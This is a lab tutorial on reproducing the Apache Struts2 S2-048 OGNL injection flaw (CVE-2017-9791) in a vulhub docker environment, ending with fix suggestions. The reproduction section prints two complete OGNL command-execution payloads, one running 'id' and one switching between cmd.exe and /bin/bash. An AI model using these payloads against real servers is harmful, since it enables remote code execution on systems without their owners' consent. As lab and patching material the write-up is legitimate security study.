How to reproduce the Apache Struts2 S2-048 remote code execution vulnerability

0x00 Introduction

The Struts2 framework is an open source web application framework for developing Java EE web applications. It builds on the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the design ideas of WebWork as its core, absorbs some of the strengths of the original Struts framework, and provides a cleaner web application framework built around the MVC design pattern.

0x01 Vulnerability Overview

Apache Struts 2.3.x installations that have the struts2-struts1-plugin enabled and the struts2-showcase application deployed are affected. The showcase's save-gangster action builds an ActionMessage by concatenating a client-controlled request parameter into the message text; the Struts 1 plugin's wrapper action then passes that text through the framework's message lookup, where the raw string is evaluated as an OGNL expression. An attacker who controls the parameter therefore obtains arbitrary code execution (S2-048, CVE-2017-9791).

0x02 Impact scope

Apache Struts 2.3.x versions that have the struts2-struts1-plugin enabled.

0x03 Environment setup

1. Building an Apache Struts2 environment by hand is fairly involved, so this lab uses the docker environment from vulhub.

Download address: https://github.com/vulhub/vulhub

2. After downloading, unzip the archive, enter the s2-048 directory and start the vulnerable environment

cd vulhub-master/struts2/s2-048/ //Enter the directory


docker-compose up -d //Start the lab environment


3. Run docker ps to check that the container started successfully


4. Open http://your-ip:8080/hello.action in the browser; when the following page appears, the environment is ready


0x04 Vulnerability reproduction

1. Open the following link in the browser to reach the vulnerable page

http://192.168.3.160:8080/integration/saveGangster.action


2. Enter ${1+1} in the first field, "Gangster Name", fill in the remaining fields with anything, and click Submit: the page echoes the name back as 2, which shows that the OGNL expression was evaluated.

3. Replace the ${1+1} in "Gangster Name" with the following command-execution payload, which runs id and returns its output in the message

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

4. Alternatively, capture the request with Burp and replace the name parameter with the following command-execution payload. This variant picks cmd.exe or /bin/bash according to the operating system and writes the command output directly into the HTTP response.

Note: the payload must be URL encoded before it is sent

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

5. The same steps can be carried out with automated scripts or graphical tools, which are not demonstrated here; such tools can be found on GitHub.

0x05 Fix suggestions

1. Upgrade to the latest Struts version.

2. Depending on business needs, disable or remove the struts2-showcase.war package (\struts-2.3.x\apps\struts2-showcase.war).

3. Follow the advice in the Apache S2-048 advisory: never pass a raw, user-controlled string to ActionMessage; use a resource key and supply the user input as a substitution value instead.

Statement
This article is reproduced from 亿速云.
